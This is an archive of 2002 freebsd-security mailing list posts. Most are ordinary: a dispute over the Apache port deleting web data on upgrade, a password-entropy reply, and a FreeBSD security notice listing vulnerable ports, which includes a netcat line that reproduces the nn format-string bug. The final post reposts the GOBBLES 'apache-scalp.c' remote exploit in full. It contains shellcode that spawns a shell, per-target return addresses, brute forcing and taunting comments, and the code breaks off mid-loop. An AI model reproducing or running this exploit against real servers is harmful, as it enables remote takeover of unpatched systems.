message From owner-freebsd-security Wed Jun 19 14:24: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.speakeasy.net (mail11.speakeasy.net [216.254.0.211]) by hub.freebsd.org (Postfix) with ESMTP id 69CEB37B408 for ; Wed, 19 Jun 2002 14:23:59 -0700 (PDT) Received: (qmail 16453 invoked from network); 19 Jun 2002 21:23:58 -0000 Received: from unknown (HELO max) ([66.92.76.227]) (envelope-sender ) by mail11.speakeasy.net (qmail-ldap-1.03) with SMTP for ; 19 Jun 2002 21:23:58 -0000 Message-ID: <200206191723590704.0033D6FF@mail.speakeasy.net> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Wed, 19 Jun 2002 17:23:59 -0400 Reply-To: jdarnold@buddydog.org From: "Jonathan Arnold" To: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >I would consider this semi-correct, at least from my experience. The data >directories ARE seperated out. Notice that there is a data.default and a I, in fact, just went through this and would beg to differ. It is not very kind to delete a complete directory tree without any warning, either when you install (something like "data.default *WILL BE REPLACED ON UPGRADE*") or it should check on upgrade and not remove it if it is there. I lost my entire web site with nary a peep, and luckily had the most= important stuff on another computer. Nothing, anywhere, says anything about data.default getting overwritten / replaced on upgrade. -- Jonathan Arnold (mailto:jdarnold@buddydog.org) The Incredible Brightness of Seeing, a Home Theater weblog http://jdarnold.tzo.com/HomeTheater To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:33:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id AEB2A37B40B for ; Wed, 19 Jun 2002 14:33:50 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA24539; Wed, 19 Jun 2002 15:33:22 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020619153117.0230db10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 19 Jun 2002 15:33:12 -0600 To: Jason DiCioccio , Jan Lentfer , From: Brett Glass Subject: Re: Apache 1.3.26 port In-Reply-To: References: <4.3.2.7.2.20020619150748.0236b1d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Interestingly, if you compile Apache from the tarball provided on the Apache Project's Web server, and use its "make install", it won't overwrite your data or your existing configuration. It's an artifact of the port. To prevent problems, I'm installing right from the Apache tarball and not using the port. --Brett At 03:14 PM 6/19/2002, Jason DiCioccio wrote: >I would consider this semi-correct, at least from my experience. The data >directories ARE seperated out. Notice that there is a data.default and a >cgi-bin.default which data and cgi-bin are linked to. If you break the >data/cgi-bin symlinks and just mkdir data/mkdir cgi-bin, your data should >not be overwritten, it should only overwrite data.default. > >If this is another issue, I haven't encountered it. > >Cheers, >-JD- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:43: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 56A7137B40E for ; Wed, 19 Jun 2002 14:42:53 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA24638; Wed, 19 Jun 2002 15:42:44 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020619153728.02374d30@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 19 Jun 2002 15:42:40 -0600 To: Jason DiCioccio , Jan Lentfer , From: Brett Glass Subject: Re: Apache 1.3.26 port In-Reply-To: References: <4.3.2.7.2.20020619150748.0236b1d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org P.S. -- While Apache's own "make install" is gentler on your data files than the current port, one thing it does that is *not* good, and persists in the port, is install things, out of the box, that the administrator might not want. For example, it always installs its own documentation and makes it publicly available from your server. A security risk? Probably not, but still not a good thing. Even experienced admins, such as the administrators of the FreeBSD Web site, often don't catch this problem. For example, if you go to http://www.freebsd.org/manual/ you will find -- guess what? -- the Apache manual, not a FreeBSD manual as you might expect. Apache's default httpd.conf creates an alias for its documentation at this location unless you edit the alias out of httpd.conf. The FreeBSD port/package of Apache should, IMHO, turn this off. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:48:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 98B5237B400 for ; Wed, 19 Jun 2002 14:47:40 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5JLlaP33773; Wed, 19 Jun 2002 15:47:36 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 19 Jun 2002 15:47:36 -0600 (CST) From: Ryan Thompson To: Eric F Crist Cc: freebsd-security@FreeBSD.ORG Subject: RE: Password security In-Reply-To: <002101c217a7$e3c28ab0$77fe180c@armageddon> Message-ID: <20020619153600.U32240-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric F Crist wrote to 'Ryan Thompson': > Just curious, what kinds of things are you trying to secure that the > basic password system hasn't worked for you? Enough valuable company data to *not* trust staff passwords with an effective 20-30 bits of entropy. :-) Even most "well-chosen" passwords that can be remembered have very limited entropy. (With the exception of good approaches like that suggested by Bill M). The point of my original post (which is being rather clouded by some of these very interesting replies :-) was to do a little (or a lot) better than the passwords that users typically pick, with the use of a human-readable generated token system, as opposed to simply remembering a shared secret that can be broken with a dictionary attack plus brute force in a matter of hours. > I personally have done work for people like the Minnesota Dept of > Agriculture in this area for building and network security, and it > has worked wonderfully for the last 4 years. Just curiousity on my > part. ;) Understood :-) - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:49:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from pike.epylon.com (mail03.epylon.com [63.93.9.99]) by hub.freebsd.org (Postfix) with ESMTP id 081C337B406 for ; Wed, 19 Jun 2002 14:49:43 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) by pike.epylon.com (Postfix) with ESMTP id A9E3F59211; Wed, 19 Jun 2002 14:49:42 -0700 (PDT) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 19 Jun 2002 14:49:41 -0700 Subject: Re: Apache 1.3.26 port From: Jason DiCioccio To: , Message-ID: In-Reply-To: <200206191723590704.0033D6FF@mail.speakeasy.net> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I agree :).. Sort of like it does when you upgrade MySQL . . I can see that it's why they have a data.default/cgi-bin.default, but it should let you know as well. I'm confused as to what you're saying though. Are you saying that it overwrote your data directory even though it was not pointing to data.default? Or are you saying that it was linked to data.default and you think (as well as I) that it should let you know before blowing data.default away (perhaps a make flag)? Cheers, -JD- On 6/19/02 2:23 PM, "Jonathan Arnold" wrote: >> I would consider this semi-correct, at least from my experience. The data >> directories ARE seperated out. Notice that there is a data.default and a > > I, in fact, just went through this and would beg to differ. It is not > very kind to delete a complete directory tree without any warning, either > when you install (something like "data.default *WILL BE REPLACED ON > UPGRADE*") or it should check on upgrade and not remove it if it is there. > I lost my entire web site with nary a peep, and luckily had the most important > stuff on another computer. > > Nothing, anywhere, says anything about data.default getting overwritten / > replaced on upgrade. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:51:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DD8BC37B477; Wed, 19 Jun 2002 14:50:20 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JLoKG06920; Wed, 19 Jun 2002 14:50:20 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Date: Wed, 19 Jun 2002 14:50:20 -0700 (PDT) Message-Id: <200206192150.g5JLoKG06920@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Notice FreeBSD-SN-02:04 Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SN-02:04 Security Notice The FreeBSD Project Topic: security issues in ports Announced: 2002-06-19 I. Introduction Several ports in the FreeBSD Ports Collection are affected by security issues. These are listed below with references and affected versions. All versions given refer to the FreeBSD port/package version numbers. The listed vulnerabilities are not specific to FreeBSD unless otherwise noted. These ports are not installed by default, nor are they ``part of FreeBSD'' as such. The FreeBSD Ports Collection contains thousands of third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications. See for more information about the FreeBSD Ports Collection. II. Ports +------------------------------------------------------------------------+ Port name: apache13, apache13-modssl, apache13-ssl, apache13+ipv6, apache13-fp, apache2 Affected: versions < apache-2.0.39 (apache2) versions < apache-1.3.26 (apache13) versions < apache+mod_ssl-1.3.26+2.8.9 (apache13-modssl) All versions (others) Status: Fixed (apache2, apache13, apache13-modssl) Not fixed (others) Denial-of-service involving chunked encoding. +------------------------------------------------------------------------+ Port name: bind9 Affected: versions < bind9-9.2.1 Status: Fixed Denial-of-service vulnerability in named. +------------------------------------------------------------------------+ Port name: courier-imap Affected: versions < courier-imap-1.4.3_1 Status: Fixed Remote denial-of-service attack (CPU utilization). +------------------------------------------------------------------------+ Port name: ethereal Affected: versions < ethereal-0.9.4 Status: Fixed Buffer overflows in SMB, X11, DNS, and GIOP dissectors. +------------------------------------------------------------------------+ Port name: fakebo Affected: versions < fakebo-0.4.1_1 Status: Fixed Format string vulnerability. +------------------------------------------------------------------------+ Port name: fragroute Affected: versions < fragroute-1.2_1 Status: Fixed The distribution file with MD5 checksum 65edbfc51f8070517f14ceeb8f721075 was trojaned. +------------------------------------------------------------------------+ Port name: ghostscript-gnu Affected: versions < ghostscript-6.53 Status: Fixed A PostScript file can cause arbitrary commands to be executed as the user running ghostscript. +------------------------------------------------------------------------+ Port name: icmpmonitor Affected: versions < icmpmonitor-1.11_1 Status: Fixed Format string vulnerability (syslog). +------------------------------------------------------------------------+ Port name: imap-uw Affected: All versions Status: Not fixed Locally exploitable stack buffer overflow when compiled with WITH_RFC1730 (which is not the default). +------------------------------------------------------------------------+ Port name: mnews Affected: All versions Status: Not fixed Remotely exploitable buffer overflows. +------------------------------------------------------------------------+ Port name: nn Affected: versions < nn-6.6.2_1 Status: Fixed Remotely exploitable format string vulnerability. Reproduce using netcat: perl -e 'printf("100 %s\n", "%x" x 800);' | nc -l -p 119 env NNTPSERVER="localhost" nn +------------------------------------------------------------------------+ Port name: sharity-light Affected: versions < sharity-light-1.2_1 Status: Fixed Stack buffer overflow when copying the username and password from the environment (variables USER, LOGNAME, and PASSWD). Reported by Niels Heinen . +------------------------------------------------------------------------+ Port name: slurp Affected: versions < slurp-1.10_1 Status: Fixed Remotely exploitable format string vulnerability. +------------------------------------------------------------------------+ Port name: xchat Affected: versions < xchat-1.8.9 Status: Fixed An IRC server may execute arbitrary commands with the privileges of the user running xchat. +------------------------------------------------------------------------+ III. Upgrading Ports/Packages To upgrade a fixed port/package, perform one of the following: 1) Upgrade your Ports Collection and rebuild and reinstall the port. Several tools are available in the Ports Collection to make this easier. See: /usr/ports/devel/portcheckout /usr/ports/misc/porteasy /usr/ports/sysutils/portupgrade 2) Deinstall the old package and install a new package obtained from [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ Packages are not automatically generated for other architectures at this time. +------------------------------------------------------------------------+ FreeBSD Security Notices are communications from the Security Officer intended to inform the user community about potential security issues, such as bugs in the third-party applications found in the Ports Collection, which will not be addressed in a FreeBSD Security Advisory. Feedback on Security Notices is welcome at . -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPRD6MlUuHi5z0oilAQFmSwP9Hs95CGjDL8PF95Z9bAxana0X9JTUYvaN qxPWiovTzED5Ityt46TySpoOcwdQkzO0ugu3/Q7zCppEDdIjXBUxARv8qvnLG7Oz f5SPItOW//5P7hmq6c9XGQrfq4XLYnv61JbgK9Cm0tGU8iVhOwm+ztpZS2FG5x+3 F4W/AphEyi8= =W9sm -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 14:57:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [63.167.241.66]) by hub.freebsd.org (Postfix) with ESMTP id AA8F937B423 for ; Wed, 19 Jun 2002 14:56:54 -0700 (PDT) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id g5JLukI21451; Wed, 19 Jun 2002 17:56:46 -0400 (EDT) (envelope-from str) Date: Wed, 19 Jun 2002 17:56:46 -0400 (EDT) From: Igor Roshchin Message-Id: <200206192156.g5JLukI21451@giganda.komkon.org> To: brett@lariat.org Subject: Re: Apache 1.3.26 port Cc: freebsd-security@freebsd.org In-Reply-To: <4.3.2.7.2.20020619153117.0230db10@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett, It's nice that you have so much energy to write so much e-mails to the mailing list. However, if you have so much time resources on you hand, why wouldn't you take a quick look in the files/patch-?? files ? If you did that, you'd see that one of the patches (patch-ab) introduces that. (see the excerpt from the patch file below). This way you would've saved your time, other people's time, and bandwidth, and produce produce a more useful result. The author of the patch (sorry, don't have time to look into the cvs tree now) didn't consider the situation that the actual data directory would be still in the same directory where *.default is pointing. One (who has some time on his hands) needs to do a few more checks before removing that directory tree. Best, Igor Excerpt from ports/apache13/files/patch-ab: --- Makefile.tmpl.orig Wed Nov 28 18:02:12 2001 +++ Makefile.tmpl Fri Jan 25 07:48:19 2002 @@ -270,10 +270,12 @@ $(MKDIR) $(root)$(mandir)/man1 $(MKDIR) $(root)$(mandir)/man8 $(MKDIR) $(root)$(sysconfdir) - $(MKDIR) $(root)$(htdocsdir) + $(RM) -rf $(root)$(htdocsdir).default + $(MKDIR) $(root)$(htdocsdir).default $(MKDIR) $(root)$(manualdir) $(MKDIR) $(root)$(iconsdir) - $(MKDIR) $(root)$(cgidir) + $(RM) -rf $(root)$(cgidir).default + $(MKDIR) $(root)$(cgidir).default $(MKDIR) $(root)$(includedir) $(MKDIR) $(root)$(includedir)/xml $(MKDIR) $(root)$(runtimedir) @@ -459,33 +461,39 @@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:16: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 0D52D37B9E5 for ; Wed, 19 Jun 2002 15:08:57 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA24981; Wed, 19 Jun 2002 16:08:05 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020619160330.023789f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 19 Jun 2002 16:07:58 -0600 To: Igor Roshchin From: Brett Glass Subject: Re: Apache 1.3.26 port Cc: freebsd-security@freebsd.org In-Reply-To: <200206192156.g5JLukI21451@giganda.komkon.org> References: <4.3.2.7.2.20020619153117.0230db10@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:56 PM 6/19/2002, Igor Roshchin wrote: >Brett, > >It's nice that you have so much energy to write so much e-mails >to the mailing list. >However, if you have so much time resources on you hand, why wouldn't you >take a quick look in the files/patch-?? files ? >If you did that, you'd see that one of the patches (patch-ab) >introduces that. Why would it need to be introduced if it was already in Apache? >(see the excerpt from the patch file below). >This way you would've saved your time, other people's time, >and bandwidth, and produce produce a more useful result. It wouldn't have changed the usefulness of what I said. Data is deleted, period. True, it's done via the symlink "data.default", but the result is the same as if /usr/local/www/data were nuked directly. >The author of the patch (sorry, don't have time to look into the cvs tree >now) If you didn't have time to look into the CVS tree, why are you making a big deal about the fact that I didn't do so... especially since what was wrong was already clear? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:27:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id 3958237B62D for ; Wed, 19 Jun 2002 15:26:57 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id 7BC291360C for ; Wed, 19 Jun 2002 15:27:26 -0700 (PDT) Date: Wed, 19 Jun 2002 15:26:49 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: freebsd-security@freebsd.org Subject: Apache expoit? Message-ID: <2147483647.1024500409@[192.168.4.154]> X-Mailer: Mulberry/3.0.0a2 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don=3Ft know if this has already made bugtraq, or if it's waiting in = their queue or what.. But I just happened to get ahold of this recently. It appears that FreeBSD and OpenBSD are exploitable. I haven't tested it yet, as I have already upgraded. Courtesy of Gobbles apparently.. The wrapping is a bit messed up, but I'm lazy :) Cheers, -JD- -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 /* * apache-scalp.c * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! * * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ! * * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING! * * ". . . and Doug Sniff said it was a hole in Epic." * * --- * Disarm you with a smile * And leave you like they left me here * To wither in denial * The bitterness of one who's left alone * --- * * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and * their crappy memcpy implementation that makes this 32-bit impossibility * very easy to accomplish. This vulnerability was recently rediscovered by a slew * of researchers. * * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. * * Don't email us asking for technical help or begging for warez. We are * busy working on many other wonderful things, including other remotely * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform * the community that those holes don't exist? We wonder who's paying her. * * This code is an early version from when we first began researching the * vulnerability. It should spawn a shell on any unpatched OpenBSD system * running the Apache webserver. * * We appreciate The Blue Boar's effort to allow us to post to his mailing * list once again. Because he finally allowed us to post, we now have this * very humble offering. * * This is a very serious vulnerability. After disclosing this exploit, we * hope to have gained immense fame and glory. * * Testbeds: synnergy.net, monkey.org, 9mm.com * * Abusing the right syscalls, any exploit against OpenBSD =3D=3D root. Kernel * bugs are great. * * [#!GOBBLES QUOTES] * * --- you just know 28923034839303 admins out there running * OpenBSD/Apache are going "ugh..not exploitable..ill do it after the * weekend" * --- "Five years without a remote hole in the default install". default * package =3D kernel. if theo knew that talkd was exploitable, he'd cry. * --- so funny how apache.org claims it's impossible to exploit this. * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ? * --- I hope Theo doesn't kill himself * --- heh, this is a middle finger to all those open source, anti-"m$" * idiots... slashdot hippies... * --- they rushed to release this exploit so they could update their ISS * scanner to have a module for this vulnerability, but it doesnt even * work... it's just looking for win32 apache versions * --- no one took us seriously when we mentioned this last year. we warned * them that moderation =3D=3D no pie. * --- now try it against synnergy :> * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM * * xxxx this thing is a major exploit. do you really wanna publish it? * oooo i'm not afraid of whitehats * xxxx the blackhats will kill you for posting that exploit * oooo blackhats are a myth * oooo so i'm not worried * oooo i've never seen one * oooo i guess it's sort of like having god in your life * oooo i don't believe there's a god * oooo but if i sat down and met him * oooo i wouldn't walk away thinking * oooo "that was one hell of a special effect" * oooo so i suppose there very well could be a blackhat somewhere * oooo but i doubt it... i've seen whitehat-blackhats with their ethics * and deep philosophy... * * [GOBBLES POSERS/WANNABES] * * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it) * --- super@GOBBLES.NET (low-level.net) * * GOBBLES Security * GOBBLES@hushmail.com * http://www.bugtraq.org * */ #include #include #include #include #include #include #include #include #include #include #include #define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */ #define RET_ADDR_INC 512 #define MEMCPY_s1_OWADDR_DELTA -146 #define PADSIZE_1 4 #define PADSIZE_2 5 #define PADSIZE_3 7 #define REP_POPULATOR 24 #define REP_RET_ADDR 6 #define REP_ZERO 36 #define REP_SHELLCODE 24 #define NOPCOUNT 1024 #define NOP 0x41 #define PADDING_1 'A' #define PADDING_2 'B' #define PADDING_3 'C' #define PUT_STRING(s) memcpy(p, s, strlen(s)); p +=3D strlen(s); #define PUT_BYTES(n, b) memset(p, b, n); p +=3D n; #define SHELLCODE_LOCALPORT_OFF 30 char shellcode[] =3D "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f" "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02" "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04" "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8" "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03" "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89" "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80" "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50" "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc"; struct { char *type; u_long retaddr; } targets[] =3D { // hehe, yes theo, that say OpenBSD here! { "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f }, { "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa }, { "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 }, { "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a }, { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae }, }; int main(int argc, char *argv[]) { char *hostp, *portp; unsigned char buf[512], *expbuf, *p; int i, j, lport; int sock; int bruteforce, owned, progress; u_long retaddr; struct sockaddr_in sin, from; if(argc !=3D 3) { printf("Usage: %s \n", argv[0]); printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n"); printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n"); printf("\n--- --- - Potential targets list - --- ----\n"); printf("Target ID / Target specification\n"); for(i =3D 0; i < sizeof(targets)/8; i++) printf("\t%d / %s\n", i, targets[i].type); return -1; } hostp =3D strtok(argv[2], ":"); if((portp =3D strtok(NULL, ":")) =3D=3D NULL) portp =3D "80"; retaddr =3D strtoul(argv[1], NULL, 16); if(retaddr < sizeof(targets)/8) { retaddr =3D targets[retaddr].retaddr; bruteforce =3D 0; } else bruteforce =3D 1; srand(getpid()); signal(SIGPIPE, SIG_IGN); for(owned =3D 0, progress =3D 0;;retaddr +=3D RET_ADDR_INC) { /* skip invalid return adresses */ i =3D retaddr & 0xff; if(i =3D=3D 0x0a || i =3D=3D 0x0d) retaddr++; else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4)) continue; sock =3D socket(AF_INET, SOCK_STREAM, 0); sin.sin_family =3D AF_INET; sin.sin_addr.s_addr =3D inet_addr(hostp); sin.sin_port =3D htons(atoi(portp)); if(!progress) printf("\n[*] Connecting.. "); fflush(stdout); if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) !=3D 0) { perror("connect()"); exit(1); } if(!progress) printf("connected!\n"); /* Setup the local port in our shellcode */ i =3D sizeof(from); if(getsockname(sock, (struct sockaddr *) & from, &i) !=3D 0) { perror("getsockname()"); exit(1); } lport =3D ntohs(from.sin_port); shellcode[SHELLCODE_LOCALPORT_OFF + 1] =3D lport & 0xff; shellcode[SHELLCODE_LOCALPORT_OFF + 0] =3D (lport >> 8) & 0xff; p =3D expbuf =3D malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR)); PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n"); for (i =3D 0; i < REP_SHELLCODE; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": "); PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1); p +=3D sizeof(shellcode) - 1; PUT_STRING("\r\n"); } for (i =3D 0; i < REP_POPULATOR; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_1, PADDING_1); PUT_STRING(": "); for (j =3D 0; j < REP_RET_ADDR; j++) { *p++ =3D retaddr & 0xff; *p++ =3D (retaddr >> 8) & 0xff; *p++ =3D (retaddr >> 16) & 0xff; *p++ =3D (retaddr >> 24) & 0xff; } PUT_BYTES(REP_ZERO, 0); PUT_STRING("\r\n"); } PUT_STRING("Transfer-Encoding: chunked\r\n"); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2); PUT_STRING(buf); PUT_BYTES(PADSIZE_2, PADDING_2); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA); PUT_STRING(buf); write(sock, expbuf, p - expbuf); progress++; if((progress%70) =3D=3D 0) progress =3D 1; if(progress =3D=3D 1) { memset(buf, 0, sizeof(buf)); sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u", retaddr, (unsigned int)(p - expbuf), lport); memset(buf + strlen(buf), ' ', 74 - strlen(buf)); puts(buf); if(bruteforce) putchar(';'); } else 